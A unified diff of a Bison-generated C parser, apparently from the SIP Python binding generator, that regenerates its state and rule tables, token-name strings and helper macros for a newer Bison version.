1289, +- 1292, 1307, 1307, 1344, 1345, 1348, 1349, 1352, 1352, 1381, +- 1382, 1385, 1391, 1397, 1402, 1407, 1408, 1418, 1425, 1425, +- 1451, 1452, 1455, 1461, 1461, 1480, 1483, 1486, 1489, 1494, +- 1495, 1500, 1508, 1545, 1553, 1559, 1564, 1565, 1578, 1586, +- 1594, 1602, 1612, 1623, 1628, 1633, 1634, 1644, 1651, 1662, +- 1667, 1672, 1673, 1683, 1690, 1702, 1707, 1712, 1713, 1723, +- 1730, 1750, 1755, 1760, 1761, 1771, 1778, 1782, 1787, 1788, +- 1798, 1801, 1804, 1818, 1836, 1841, 1846, 1847, 1857, 1864, +- 1868, 1873, 1874, 1884, 1887, 1890, 1904, 1915, 1925, 1925, +- 1938, 1943, 1944, 1961, 1973, 1991, 2003, 2015, 2027, 2039, +- 2051, 2063, 2082, 2086, 2091, 2092, 2102, 2105, 2108, 2111, +- 2125, 2126, 2142, 2145, 2148, 2157, 2163, 2168, 2169, 2180, +- 2186, 2194, 2202, 2208, 2213, 2218, 2219, 2229, 2236, 2239, +- 2244, 2247, 2252, 2255, 2260, 2266, 2272, 2278, 2283, 2288, +- 2293, 2298, 2303, 2308, 2313, 2318, 2323, 2328, 2333, 2338, +- 2344, 2349, 2355, 2361, 2367, 2373, 2379, 2384, 2390, 2396, +- 2401, 2407, 2413, 2419, 2424, 2425, 2435, 2442, 2526, 2530, +- 2536, 2541, 2542, 2553, 2559, 2567, 2570, 2573, 2582, 2588, +- 2593, 2594, 2605, 2611, 2622, 2627, 2630, 2631, 2641, 2641, +- 2665, 2668, 2671, 2676, 2679, 2684, 2687, 2692, 2693, 2696, +- 2697, 2700, 2701, 2702, 2746, 2747, 2750, 2751, 2754, 2757, +- 2762, 2763, 2781, 2784, 2787, 2790, 2793, 2796, 2801, 2804, +- 2807, 2810, 2813, 2816, 2819, 2824, 2839, 2842, 2847, 2853, +- 2856, 2857, 2865, 2870, 2873, 2878, 2887, 2897, 2900, 2904, +- 2908, 2912, 2916, 2920, 2926, 2931, 2937, 2955, 2977, 3016, +- 3022, 3016, 3066, 3066, 3092, 3097, 3103, 3097, 3143, 3144, +- 3147, 3148, 3151, 3203, 3206, 3209, 3212, 3217, 3220, 3225, +- 3226, 3227, 3230, 3231, 3232, 3233, 3234, 3235, 3236, 3237, +- 3238, 3239, 3240, 3251, 3255, 3259, 3270, 3281, 3292, 3303, +- 3314, 3325, 3336, 3347, 3358, 3369, 3380, 3391, 3392, 3393, +- 3394, 3405, 3416, 3427, 3434, 3441, 3448, 3457, 3470, 3475, +- 3476, 3488, 3495, 3502, 3511, 3515, 3520, 3521, 3531, 3534, +- 3537, 3551, 3552, 3555, 3558, 3564, 3564, 3565, 3568, 3634, +- 3634, 3635, 3638, 3684, 3687, 3687, 3698, 3701, 3701, 3713, +- 3731, 3751, 3795, 3876, 3877, 3878, 3879, 3880, 3881, 3882, +- 3883, 3884, 3885, 3886, 3887, 3888, 3889, 3890, 3891, 3892, +- 3893, 3894, 3895, 3896, 3897, 3898, 3899, 3900, 3901, 3902, +- 3903, 3904, 3907, 3910, 3915, 3918, 3923, 3926, 3934, 3937, +- 3943, 3947, 3959, 3963, 3969, 3973, 3996, 4000, 4006, 4009, +- 4014, 4017, 4022, 4025, 4030, 4033, 4038, 4090, 4095, 4101, +- 4124, 4136, 4148, 4160, 4179, 4190, 4207, 4224, 4233, 4240, +- 4240, 4241, 4241, 4242, 4246, 4246, 4247, 4251, 4252, 4256, +- 4256, 4257, 4260, 4315, 4321, 4326, 4327, 4339, 4342, 4345, +- 4360, 4375, 4392, 4397, 4411, 4521, 4524, 4532, 4535, 4538, +- 4543, 4551, 4562, 4577, 4581, 4585, 4589, 4593, 4597, 4601, +- 4605, 4609, 4613, 4617, 4621, 4625, 4629, 4633, 4637, 4641, +- 4645, 4649, 4653, 4657, 4661, 4665, 4669, 4673, 4677, 4681, +- 4685, 4691, 4697, 4713, 4716, 4724, 4730, 4737 ++ 0, 575, 575, 576, 579, 579, 598, 599, 600, 601, ++ 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, ++ 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, ++ 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, ++ 632, 633, 634, 635, 638, 639, 640, 641, 642, 643, ++ 644, 645, 646, 647, 648, 649, 662, 668, 673, 678, ++ 679, 689, 696, 702, 707, 712, 713, 723, 730, 739, ++ 744, 749, 750, 760, 767, 778, 783, 788, 789, 799, ++ 806, 835, 840, 845, 846, 856, 863, 889, 897, 902, ++ 903, 914, 920, 928, 975, 979, 1086, 1091, 1092, 1103, ++ 1106, 1109, 1123, 1139, 1144, 1144, 1167, 1167, 1234, 1248, ++ 1249, 1252, 1253, 1254, 1258, 1262, 1271, 1280, 1289, 1290, ++ 1293, 1308, 1308, 1345, 1346, 1349, 1350, 1353, 1353, 1382, ++ 1383, 1386, 1392, 1398, 1403, 1408, 1409, 1419, 1426, 1426, ++ 1452, 1453, 1456, 1462, 1462, 1481, 1484, 1487, 1490, 1495, ++ 1496, 1501, 1509, 1546, 1554, 1560, 1565, 1566, 1579, 1587, ++ 1595, 1603, 1613, 1624, 1629, 1634, 1635, 1645, 1652, 1663, ++ 1668, 1673, 1674, 1684, 1691, 1703, 1708, 1713, 1714, 1724, ++ 1731, 1751, 1756, 1761, 1762, 1772, 1779, 1783, 1788, 1789, ++ 1799, 1802, 1805, 1819, 1837, 1842, 1847, 1848, 1858, 1865, ++ 1869, 1874, 1875, 1885, 1888, 1891, 1905, 1917, 1927, 1927, ++ 1941, 1946, 1947, 1965, 1978, 1997, 2010, 2023, 2036, 2049, ++ 2062, 2075, 2088, 2108, 2112, 2117, 2118, 2128, 2131, 2134, ++ 2137, 2151, 2152, 2168, 2171, 2174, 2183, 2189, 2194, 2195, ++ 2206, 2212, 2220, 2228, 2234, 2239, 2244, 2245, 2255, 2262, ++ 2265, 2270, 2273, 2278, 2281, 2286, 2292, 2298, 2304, 2309, ++ 2314, 2319, 2324, 2329, 2334, 2339, 2344, 2349, 2354, 2359, ++ 2364, 2370, 2375, 2381, 2387, 2393, 2399, 2405, 2410, 2416, ++ 2422, 2427, 2433, 2439, 2445, 2450, 2451, 2461, 2468, 2552, ++ 2556, 2562, 2567, 2568, 2579, 2585, 2593, 2596, 2599, 2608, ++ 2614, 2619, 2620, 2631, 2637, 2648, 2653, 2656, 2657, 2667, ++ 2667, 2691, 2694, 2697, 2702, 2705, 2710, 2713, 2718, 2719, ++ 2722, 2723, 2726, 2727, 2728, 2772, 2773, 2776, 2777, 2780, ++ 2783, 2788, 2789, 2807, 2810, 2813, 2816, 2819, 2822, 2827, ++ 2830, 2833, 2836, 2839, 2842, 2845, 2850, 2865, 2868, 2873, ++ 2879, 2882, 2883, 2891, 2896, 2899, 2904, 2913, 2923, 2926, ++ 2930, 2934, 2938, 2942, 2946, 2952, 2957, 2963, 2981, 3003, ++ 3042, 3048, 3042, 3092, 3092, 3118, 3123, 3129, 3123, 3169, ++ 3170, 3173, 3174, 3177, 3229, 3232, 3235, 3238, 3243, 3246, ++ 3251, 3252, 3253, 3256, 3257, 3258, 3259, 3260, 3261, 3262, ++ 3263, 3264, 3265, 3266, 3277, 3281, 3285, 3296, 3307, 3318, ++ 3329, 3340, 3351, 3362, 3373, 3384, 3395, 3406, 3417, 3418, ++ 3419, 3420, 3431, 3442, 3453, 3460, 3467, 3474, 3483, 3496, ++ 3501, 3502, 3514, 3521, 3528, 3537, 3541, 3546, 3547, 3557, ++ 3560, 3563, 3577, 3578, 3581, 3584, 3590, 3590, 3591, 3594, ++ 3660, 3660, 3661, 3664, 3710, 3713, 3713, 3724, 3727, 3727, ++ 3739, 3757, 3777, 3821, 3902, 3903, 3904, 3905, 3906, 3907, ++ 3908, 3909, 3910, 3911, 3912, 3913, 3914, 3915, 3916, 3917, ++ 3918, 3919, 3920, 3921, 3922, 3923, 3924, 3925, 3926, 3927, ++ 3928, 3929, 3930, 3933, 3936, 3941, 3944, 3949, 3952, 3960, ++ 3963, 3969, 3973, 3985, 3989, 3995, 3999, 4022, 4026, 4032, ++ 4035, 4040, 4043, 4048, 4051, 4056, 4059, 4064, 4116, 4121, ++ 4127, 4150, 4162, 4174, 4186, 4205, 4216, 4233, 4250, 4259, ++ 4266, 4266, 4267, 4267, 4268, 4272, 4272, 4273, 4277, 4278, ++ 4282, 4282, 4283, 4286, 4341, 4347, 4352, 4353, 4365, 4368, ++ 4371, 4386, 4401, 4418, 4423, 4437, 4547, 4550, 4558, 4561, ++ 4564, 4569, 4577, 4588, 4603, 4607, 4611, 4615, 4619, 4623, ++ 4627, 4631, 4635, 4639, 4643, 4647, 4651, 4655, 4659, 4663, ++ 4667, 4671, 4675, 4679, 4683, 4687, 4691, 4695, 4699, 4703, ++ 4707, 4711, 4717, 4723, 4739, 4742, 4750, 4756, 4763 + }; + #endif + +-#if YYDEBUG || YYERROR_VERBOSE || YYTOKEN_TABLE ++/** Accessing symbol of state STATE. */ ++#define YY_ACCESSING_SYMBOL(State) YY_CAST (yysymbol_kind_t, yystos[State]) ++ ++#if YYDEBUG || 0 ++/* The user-facing name of the symbol whose (internal) number is ++ YYSYMBOL. No bounds checking. */ ++static const char *yysymbol_name (yysymbol_kind_t yysymbol) YY_ATTRIBUTE_UNUSED; ++ + /* YYTNAME[SYMBOL-NUM] -- String name of the symbol SYMBOL-NUM. + First, the terminals, then, starting at YYNTOKENS, nonterminals. */ + static const char *const yytname[] = + { +- "$end", "error", "$undefined", "TK_API", "TK_AUTOPYNAME", +- "TK_DEFDOCSTRFMT", "TK_DEFDOCSTRSIG", "TK_DEFENCODING", "TK_PLUGIN", +- "TK_VIRTERRORHANDLER", "TK_EXPTYPEHINTCODE", "TK_TYPEHINTCODE", +- "TK_DOCSTRING", "TK_DOC", "TK_EXPORTEDDOC", "TK_EXTRACT", "TK_MAKEFILE", +- "TK_ACCESSCODE", "TK_GETCODE", "TK_SETCODE", "TK_PREINITCODE", +- "TK_INITCODE", "TK_POSTINITCODE", "TK_FINALCODE", "TK_UNITCODE", +- "TK_UNITPOSTINCLUDECODE", "TK_MODCODE", "TK_TYPECODE", "TK_PREPYCODE", +- "TK_COPYING", "TK_MAPPEDTYPE", "TK_CODELINE", "TK_IF", "TK_END", +- "TK_NAME_VALUE", "TK_PATH_VALUE", "TK_STRING_VALUE", ++ "\"end of file\"", "error", "\"invalid token\"", "TK_API", ++ "TK_AUTOPYNAME", "TK_DEFDOCSTRFMT", "TK_DEFDOCSTRSIG", "TK_DEFENCODING", ++ "TK_PLUGIN", "TK_VIRTERRORHANDLER", "TK_EXPTYPEHINTCODE", ++ "TK_TYPEHINTCODE", "TK_DOCSTRING", "TK_DOC", "TK_EXPORTEDDOC", ++ "TK_EXTRACT", "TK_MAKEFILE", "TK_ACCESSCODE", "TK_GETCODE", "TK_SETCODE", ++ "TK_PREINITCODE", "TK_INITCODE", "TK_POSTINITCODE", "TK_FINALCODE", ++ "TK_UNITCODE", "TK_UNITPOSTINCLUDECODE", "TK_MODCODE", "TK_TYPECODE", ++ "TK_PREPYCODE", "TK_COPYING", "TK_MAPPEDTYPE", "TK_CODELINE", "TK_IF", ++ "TK_END", "TK_NAME_VALUE", "TK_PATH_VALUE", "TK_STRING_VALUE", + "TK_VIRTUALCATCHERCODE", "TK_TRAVERSECODE", "TK_CLEARCODE", + "TK_GETBUFFERCODE", "TK_RELEASEBUFFERCODE", "TK_READBUFFERCODE", + "TK_WRITEBUFFERCODE", "TK_SEGCOUNTCODE", "TK_CHARBUFFERCODE", +@@ -1264,13 +1217,13 @@ static const char *const yytname[] = + "TK_DEFSUPERTYPE", "TK_PROPERTY", "TK_HIDE_NS", "TK_FORMAT", "TK_GET", + "TK_ID", "TK_KWARGS", "TK_LANGUAGE", "TK_LICENSEE", "TK_NAME", + "TK_OPTIONAL", "TK_ORDER", "TK_REMOVELEADING", "TK_SET", "TK_SIGNATURE", +- "TK_TIMESTAMP", "TK_TYPE", "TK_USEARGNAMES", "TK_USELIMITEDAPI", +- "TK_ALLRAISEPYEXC", "TK_CALLSUPERINIT", "TK_DEFERRORHANDLER", +- "TK_VERSION", "'('", "')'", "','", "'='", "'{'", "'}'", "';'", "'!'", +- "'-'", "'+'", "'*'", "'/'", "'&'", "'|'", "'~'", "'<'", "'>'", "':'", +- "'['", "']'", "'%'", "'^'", "$accept", "specification", "statement", +- "@1", "modstatement", "nsstatement", "defdocstringfmt", +- "defdocstringfmt_args", "defdocstringfmt_arg_list", ++ "TK_TIMESTAMP", "TK_TYPE", "TK_USEARGNAMES", "TK_PYSSIZETCLEAN", ++ "TK_USELIMITEDAPI", "TK_ALLRAISEPYEXC", "TK_CALLSUPERINIT", ++ "TK_DEFERRORHANDLER", "TK_VERSION", "'('", "')'", "','", "'='", "'{'", ++ "'}'", "';'", "'!'", "'-'", "'+'", "'*'", "'/'", "'&'", "'|'", "'~'", ++ "'<'", "'>'", "':'", "'['", "']'", "'%'", "'^'", "$accept", ++ "specification", "statement", "$@1", "modstatement", "nsstatement", ++ "defdocstringfmt", "defdocstringfmt_args", "defdocstringfmt_arg_list", + "defdocstringfmt_arg", "defdocstringsig", "defdocstringsig_args", + "defdocstringsig_arg_list", "defdocstringsig_arg", "defencoding", + "defencoding_args", "defencoding_arg_list", "defencoding_arg", "plugin", +@@ -1278,13 +1231,13 @@ static const char *const yytname[] = + "veh_args", "veh_arg_list", "veh_arg", "api", "api_args", "api_arg_list", + "api_arg", "exception", "baseexception", "exception_body", + "exception_body_directives", "exception_body_directive", "raisecode", +- "mappedtype", "@2", "mappedtypetmpl", "@3", "mtdefinition", "mtbody", +- "mtline", "mtfunction", "namespace", "@4", "optnsbody", "nsbody", +- "platforms", "@5", "platformlist", "platform", "feature", "feature_args", +- "feature_arg_list", "feature_arg", "timeline", "@6", "qualifierlist", +- "qualifiername", "ifstart", "@7", "oredqualifiers", "qualifiers", +- "ifend", "license", "license_args", "license_arg_list", "license_arg", +- "defmetatype", "defmetatype_args", "defmetatype_arg_list", ++ "mappedtype", "$@2", "mappedtypetmpl", "$@3", "mtdefinition", "mtbody", ++ "mtline", "mtfunction", "namespace", "$@4", "optnsbody", "nsbody", ++ "platforms", "$@5", "platformlist", "platform", "feature", ++ "feature_args", "feature_arg_list", "feature_arg", "timeline", "$@6", ++ "qualifierlist", "qualifiername", "ifstart", "$@7", "oredqualifiers", ++ "qualifiers", "ifend", "license", "license_args", "license_arg_list", ++ "license_arg", "defmetatype", "defmetatype_args", "defmetatype_arg_list", + "defmetatype_arg", "defsupertype", "defsupertype_args", + "defsupertype_arg_list", "defsupertype_arg", "hiddenns", "hiddenns_args", + "hiddenns_arg_list", "hiddenns_arg", "consmodule", "consmodule_args", +@@ -1292,7 +1245,7 @@ static const char *const yytname[] = + "consmodule_body_directives", "consmodule_body_directive", "compmodule", + "compmodule_args", "compmodule_arg_list", "compmodule_arg", + "compmodule_body", "compmodule_body_directives", +- "compmodule_body_directive", "module", "module_args", "@8", ++ "compmodule_body_directive", "module", "module_args", "$@8", + "module_arg_list", "module_arg", "module_body", "module_body_directives", + "module_body_directive", "dottedname", "optnumber", "include", + "include_args", "include_arg_list", "include_arg", "optinclude", +@@ -1307,1011 +1260,950 @@ static const char *const yytname[] = + "autopyname_args", "autopyname_arg_list", "autopyname_arg", "docstring", + "docstring_args", "docstring_arg_list", "docstring_arg", "optdocstring", + "extract", "extract_args", "extract_arg_list", "extract_arg", "makefile", +- "codeblock", "codelines", "enum", "@9", "optenumkey", "optfilename", ++ "codeblock", "codelines", "enum", "$@9", "optenumkey", "optfilename", + "optname", "optenumbody", "enumbody", "enumline", "optcomma", + "optenumassign", "optassign", "expr", "binop", "optunop", "value", + "optcast", "scopedname", "scopednamehead", "scopepart", "bool_value", +- "simplevalue", "exprlist", "typedef", "struct", "@10", "@11", +- "classtmpl", "@12", "template", "class", "@13", "@14", "superclasses", ++ "simplevalue", "exprlist", "typedef", "struct", "$@10", "$@11", ++ "classtmpl", "$@12", "template", "class", "$@13", "$@14", "superclasses", + "superlist", "superclass", "class_access", "optclassbody", "classbody", + "classline", "property", "property_args", "property_arg_list", + "property_arg", "property_body", "property_body_directives", +- "property_body_directive", "name_or_string", "optslot", "dtor", "@15", +- "dtor_decl", "ctor", "@16", "simplector", "optctorsig", "@17", "optsig", +- "@18", "function", "operatorname", "optconst", "optfinal", "optabstract", +- "optflags", "flaglist", "flag", "flagvalue", "virtualcallcode", +- "methodcode", "premethodcode", "virtualcatchercode", "arglist", +- "rawarglist", "argvalue", "varmember", "@19", "@20", "simple_varmem", +- "@21", "varmem", "member", "@22", "variable", "variable_body", +- "variable_body_directives", "variable_body_directive", "cpptype", +- "argtype", "optref", "deref", "basetype", "cpptypelist", "optexceptions", +- "exceptionlist", 0 ++ "property_body_directive", "name_or_string", "optslot", "dtor", "$@15", ++ "dtor_decl", "ctor", "$@16", "simplector", "optctorsig", "$@17", ++ "optsig", "$@18", "function", "operatorname", "optconst", "optfinal", ++ "optabstract", "optflags", "flaglist", "flag", "flagvalue", ++ "virtualcallcode", "methodcode", "premethodcode", "virtualcatchercode", ++ "arglist", "rawarglist", "argvalue", "varmember", "$@19", "$@20", ++ "simple_varmem", "$@21", "varmem", "member", "$@22", "variable", ++ "variable_body", "variable_body_directives", "variable_body_directive", ++ "cpptype", "argtype", "optref", "deref", "basetype", "cpptypelist", ++ "optexceptions", "exceptionlist", YY_NULLPTR + }; ++ ++static const char * ++yysymbol_name (yysymbol_kind_t yysymbol) ++{ ++ return yytname[yysymbol]; ++} + #endif + +-# ifdef YYPRINT +-/* YYTOKNUM[YYLEX-NUM] -- Internal token number corresponding to +- token YYLEX-NUM. */ +-static const yytype_uint16 yytoknum[] = +-{ +- 0, 256, 257, 258, 259, 260, 261, 262, 263, 264, +- 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, +- 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, +- 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, +- 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, +- 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, +- 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, +- 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, +- 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, +- 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, +- 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, +- 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, +- 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, +- 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, +- 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, +- 405, 406, 40, 41, 44, 61, 123, 125, 59, 33, +- 45, 43, 42, 47, 38, 124, 126, 60, 62, 58, +- 91, 93, 37, 94 +-}; +-# endif ++#define YYPACT_NINF (-840) + +-/* YYR1[YYN] -- Symbol number of symbol that rule YYN derives. */ +-static const yytype_uint16 yyr1[] = +-{ +- 0, 174, 175, 175, 177, 176, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 179, 179, 179, 179, 179, 179, +- 179, 179, 179, 179, 179, 179, 180, 181, 181, 182, +- 182, 183, 184, 185, 185, 186, 186, 187, 188, 189, +- 189, 190, 190, 191, 192, 193, 193, 194, 194, 195, +- 196, 197, 197, 198, 198, 199, 200, 201, 201, 202, +- 202, 203, 203, 204, 205, 205, 206, 207, 207, 208, +- 208, 208, 208, 209, 211, 210, 213, 212, 214, 215, +- 215, 216, 216, 216, 216, 216, 216, 216, 216, 216, +- 217, 219, 218, 220, 220, 221, 221, 223, 222, 224, +- 224, 225, 226, 227, 227, 228, 228, 229, 231, 230, +- 232, 232, 233, 235, 234, 236, 236, 236, 236, 237, +- 237, 238, 239, 240, 240, 240, 241, 241, 242, 242, +- 242, 242, 243, 244, 244, 245, 245, 246, 247, 248, +- 248, 249, 249, 250, 251, 252, 252, 253, 253, 254, +- 255, 256, 256, 257, 257, 258, 259, 259, 260, 260, +- 261, 261, 261, 262, 263, 263, 264, 264, 265, 266, +- 266, 267, 267, 268, 268, 268, 269, 269, 271, 270, +- 270, 272, 272, 273, 273, 273, 273, 273, 273, 273, +- 273, 273, 274, 274, 275, 275, 276, 276, 276, 276, +- 277, 277, 278, 278, 279, 280, 280, 281, 281, 282, +- 282, 283, 284, 285, 285, 286, 286, 287, 288, 288, +- 289, 289, 290, 290, 291, 292, 293, 294, 295, 296, +- 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, +- 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, +- 317, 318, 319, 320, 321, 321, 322, 323, 324, 324, +- 324, 325, 325, 326, 326, 327, 327, 328, 329, 329, +- 330, 330, 331, 331, 332, 333, 334, 334, 336, 335, +- 337, 337, 337, 338, 338, 339, 339, 340, 340, 341, +- 341, 342, 342, 342, 343, 343, 344, 344, 345, 345, +- 346, 346, 347, 347, 347, 347, 347, 347, 348, 348, +- 348, 348, 348, 348, 348, 349, 350, 350, 351, 351, +- 352, 352, 353, 354, 354, 355, 355, 355, 355, 355, +- 355, 355, 355, 355, 356, 356, 356, 357, 357, 359, +- 360, 358, 362, 361, 363, 365, 366, 364, 367, 367, +- 368, 368, 369, 370, 370, 370, 370, 371, 371, 372, +- 372, 372, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 374, 375, 376, +- 376, 377, 377, 377, 378, 378, 379, 379, 380, 380, +- 380, 381, 381, 382, 382, 384, 383, 383, 385, 387, +- 386, 386, 388, 389, 390, 389, 391, 392, 391, 393, +- 393, 393, 393, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 394, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 394, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 395, 395, 396, 396, 397, 397, 398, 398, +- 399, 399, 400, 400, 401, 401, 401, 401, 402, 402, +- 403, 403, 404, 404, 405, 405, 406, 407, 407, 407, +- 408, 408, 408, 408, 408, 408, 408, 408, 408, 410, +- 409, 411, 409, 409, 413, 412, 412, 414, 414, 416, +- 415, 415, 417, 418, 418, 419, 419, 420, 420, 420, +- 420, 420, 421, 421, 422, 423, 423, 424, 424, 424, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 426, 426, 427, 427, 428, 428, 428 +-}; ++#define yypact_value_is_default(Yyn) \ ++ ((Yyn) == YYPACT_NINF) + +-/* YYR2[YYN] -- Number of symbols composing right hand side of rule YYN. */ +-static const yytype_uint8 yyr2[] = ++#define YYTABLE_NINF (-564) ++ ++#define yytable_value_is_error(Yyn) \ ++ 0 ++ ++/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing ++ STATE-NUM. */ ++static const yytype_int16 yypact[] = + { +- 0, 2, 1, 2, 0, 2, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, +- 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, +- 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, +- 3, 1, 3, 1, 3, 3, 2, 2, 3, 1, +- 3, 3, 3, 5, 0, 3, 4, 1, 2, 1, +- 1, 1, 1, 2, 0, 5, 0, 6, 4, 1, +- 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, +- 14, 0, 5, 0, 3, 1, 2, 0, 5, 1, +- 2, 1, 2, 1, 3, 1, 3, 3, 0, 5, +- 1, 2, 1, 0, 5, 1, 2, 3, 4, 1, +- 3, 1, 3, 0, 1, 3, 1, 3, 3, 3, +- 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, +- 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, +- 3, 1, 3, 1, 3, 3, 0, 4, 1, 2, +- 1, 1, 1, 3, 1, 3, 1, 3, 3, 0, +- 4, 1, 2, 1, 1, 1, 3, 3, 0, 3, +- 3, 1, 3, 3, 3, 3, 3, 3, 3, 3, +- 3, 3, 0, 4, 1, 2, 1, 1, 1, 1, +- 1, 1, 0, 1, 2, 1, 3, 1, 3, 3, +- 3, 2, 2, 1, 3, 1, 3, 3, 0, 2, +- 0, 2, 0, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 3, 1, 3, 3, 3, 0, 1, +- 3, 1, 3, 3, 3, 0, 1, 3, 1, 3, +- 1, 3, 3, 3, 4, 2, 1, 2, 0, 9, +- 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, +- 2, 1, 1, 4, 0, 1, 0, 2, 0, 2, +- 1, 3, 1, 1, 1, 1, 1, 1, 0, 1, +- 1, 1, 1, 1, 1, 3, 0, 3, 2, 1, +- 1, 3, 1, 1, 1, 1, 4, 2, 1, 1, +- 1, 1, 1, 1, 0, 1, 3, 6, 12, 0, +- 0, 8, 0, 3, 4, 0, 0, 8, 0, 2, +- 1, 3, 2, 0, 1, 1, 1, 0, 3, 0, +- 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 2, 2, 2, 3, 3, 3, 2, 3, 3, 1, +- 3, 3, 3, 3, 0, 4, 1, 2, 1, 1, +- 1, 1, 1, 0, 1, 0, 3, 1, 11, 0, +- 3, 1, 11, 0, 0, 6, 0, 0, 7, 17, +- 7, 17, 16, 1, 1, 1, 1, 1, 1, 1, +- 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 3, 3, 1, 2, 2, 1, 2, 2, 2, +- 1, 2, 0, 1, 0, 1, 0, 2, 0, 3, +- 1, 3, 1, 3, 1, 5, 1, 1, 0, 2, +- 0, 2, 0, 2, 0, 2, 1, 0, 1, 3, +- 4, 4, 4, 3, 3, 6, 6, 3, 2, 0, +- 3, 0, 3, 1, 0, 3, 1, 1, 1, 0, +- 3, 1, 8, 0, 3, 1, 2, 1, 1, 2, +- 2, 2, 4, 3, 3, 0, 1, 0, 3, 2, +- 1, 4, 2, 2, 1, 1, 2, 1, 1, 2, +- 2, 3, 1, 1, 1, 2, 2, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 3, 0, 4, 0, 1, 3 ++ -840, 125, -840, 1218, -840, -840, 42, -2, 54, 55, ++ 58, 74, 100, 100, 100, 100, 75, 181, 100, 100, ++ 100, 100, 100, 100, 100, 100, 1542, 51, -840, -840, ++ 23, 228, 46, 100, 100, 100, 48, 238, 62, 64, ++ 84, 84, -840, -840, -840, 190, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, 218, ++ 224, 277, 279, 1542, -840, -840, 1506, 309, -840, -840, ++ 76, 59, 1506, 84, 203, -840, 66, 68, 53, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, 206, 285, -840, -840, -840, -840, ++ 359, -840, -840, -840, 79, -840, 297, -26, -840, -840, ++ 254, -840, -840, 268, -840, -840, 271, -840, -840, 281, ++ -840, -840, 286, 100, -840, -840, 257, -840, -840, -840, ++ -840, 101, 100, 395, -840, -840, -840, -840, -840, -840, ++ -840, -840, 84, 276, -840, -840, 158, -840, -840, -840, ++ 298, -840, -840, -840, -840, -840, -840, 338, 287, -840, ++ 335, 324, 342, -840, 331, 344, -840, -840, 18, -840, ++ -840, -840, 418, -840, -840, -840, 447, -840, 285, -840, ++ 77, -840, 378, 380, -840, 400, -840, -840, 171, 276, ++ 388, 390, 1506, 404, -840, -840, 406, -840, -840, 407, ++ -840, -840, 1506, 279, 1542, 482, -49, 234, 146, -840, ++ 391, 392, 169, -840, 393, 210, -840, 396, 214, -840, ++ 399, 222, -840, 401, 295, -840, 402, 306, -840, -840, ++ -840, -840, 403, 405, 312, -840, -840, -840, 100, -840, ++ 516, -840, 4, 408, 409, 316, -840, 410, 323, -840, ++ 412, 413, 414, 416, 417, 419, 420, 421, 422, 423, ++ 326, -840, 244, -840, 335, -840, -840, 424, 337, -840, ++ 267, -840, 425, 339, -840, 267, -840, 381, 381, -840, ++ 276, -840, 146, 276, 397, 426, 528, 529, 428, 341, ++ -840, 429, 430, 431, 432, 343, -840, -840, 1279, 84, ++ 276, -840, -21, 433, 349, -840, 435, 352, -840, 436, ++ 354, -840, -9, -840, 276, -840, 1279, 437, 439, 105, ++ 440, 441, 442, 443, 444, 449, 450, -840, 34, -34, ++ 438, 451, 452, 456, 486, -840, -840, 314, 488, -840, ++ -26, 567, -840, 254, 575, -840, 268, 576, -840, 271, ++ 579, -840, 281, 580, -840, 286, 581, 513, -840, 101, ++ -840, 465, -11, -840, 466, 461, 590, 530, 472, 467, ++ 